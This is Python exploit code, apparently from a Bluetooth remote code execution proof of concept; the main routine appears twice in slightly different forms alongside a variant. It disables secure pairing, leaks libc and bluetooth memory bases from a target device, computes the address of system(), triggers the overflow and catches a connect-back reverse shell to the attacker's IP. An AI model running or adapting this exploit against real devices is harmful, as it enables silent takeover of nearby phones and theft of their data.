def main(src_hci, dst, my_ip):
os.system('hciconfig %s sspmode 0' % (src_hci, ))
os.system('hcitool dc %s' % (dst, ))
sh_s, stdin, stdout = connectback.create_sockets(NC_PORT, STDIN_PORT,
STDOUT_PORT)
for i in range(PWN_ATTEMPTS):
log.info('Pwn attempt %d:' % (i, ))
# Create a new BDADDR
src = set_rand_bdaddr(src_hci)
#set_bt_name("TESTTESTTESTTEST", src_hci, src, dst) # Set Name, REMOTE_NAME address search
# Try to leak section bases
for j in range(LEAK_ATTEMPTS):
libc_text_base, bluetooth_default_bss_base = memory_leak_get_bases(
src, src_hci, dst)
if (libc_text_base & 0xfff
== 0) and (bluetooth_default_bss_base & 0xfff == 0):
break
else:
assert False, "Memory doesn't seem to have leaked as expected. Wrong .so versions?"
system_addr = LIBC_TEXT_STSTEM_OFFSET + libc_text_base
acl_name_addr = BSS_ACL_REMOTE_NAME_OFFSET + bluetooth_default_bss_base
assert acl_name_addr % 4 == 0
log.info('system: 0x%08x, acl_name: 0x%08x' %
(system_addr, acl_name_addr))
pwn(src_hci, dst, bluetooth_default_bss_base, system_addr,
acl_name_addr, my_ip, libc_text_base)
# Check if we got a connectback
readable, _, _ = select.select([sh_s], [], [], PWNING_TIMEOUT)
if readable:
log.info('Done')
break
else:
assert False, "Pwning failed all attempts"
connectback.interactive_shell(sh_s, stdin, stdout, my_ip, STDIN_PORT,
STDOUT_PORT)
def doit(dst, my_ip):
os.system('hciconfig %s sspmode 0' % (HCI_DEV, ))
os.system('hcitool dc %s' % (dst, ))
sh_s, stdin, stdout = connectback.create_sockets(NC_PORT, STDIN_PORT,
STDOUT_PORT)
SYSTEM_ADDR = LIBC_BASE + SYSTEM_OFFSET
ACL_NAME_ADDR = BLUETOOTH_BSS_BASE + ACL_NAME_OFFSET
print("[*] SYSTEM_ADDR: 0x%x" % SYSTEM_ADDR)
print("[*] PAYLOAD_ADDR: 0x%x" % ACL_NAME_ADDR)
pwn(dst, SYSTEM_ADDR, ACL_NAME_ADDR, my_ip)
readable, _, _ = select.select([sh_s], [], [], PWNING_TIMEOUT)
if readable:
print('[*] Done')
connectback.interactive_shell(sh_s, stdin, stdout, my_ip, STDIN_PORT,
STDOUT_PORT)
def main(src_hci, dst, my_ip):
os.system('hciconfig %s sspmode 0' % (src_hci,))
os.system('hcitool dc %s' % (dst,))
sh_s, stdin, stdout = connectback.create_sockets(NC_PORT, STDIN_PORT, STDOUT_PORT)
for i in range(PWN_ATTEMPTS):
log.info('Pwn attempt %d:' % (i,))
# Create a new BDADDR
src = set_rand_bdaddr(src_hci)
# Try to leak section bases
for j in range(LEAK_ATTEMPTS):
libc_text_base, bluetooth_default_bss_base = memory_leak_get_bases(src, src_hci, dst)
if (libc_text_base & 0xfff == 0) and (bluetooth_default_bss_base & 0xfff == 0):
break
else:
assert False, "Memory doesn't seem to have leaked as expected. Wrong .so versions?"
system_addr = LIBC_TEXT_STSTEM_OFFSET + libc_text_base
acl_name_addr = BSS_ACL_REMOTE_NAME_OFFSET + bluetooth_default_bss_base
assert acl_name_addr % 4 == 0
log.info('system: 0x%08x, acl_name: 0x%08x' % (system_addr, acl_name_addr))
pwn(src_hci, dst, bluetooth_default_bss_base, system_addr, acl_name_addr, my_ip, libc_text_base)
# Check if we got a connectback
readable, _, _ = select.select([sh_s], [], [], PWNING_TIMEOUT)
if readable:
log.info('Done')
break
else:
assert False, "Pwning failed all attempts"
connectback.interactive_shell(sh_s, stdin, stdout, my_ip, STDIN_PORT, STDOUT_PORT)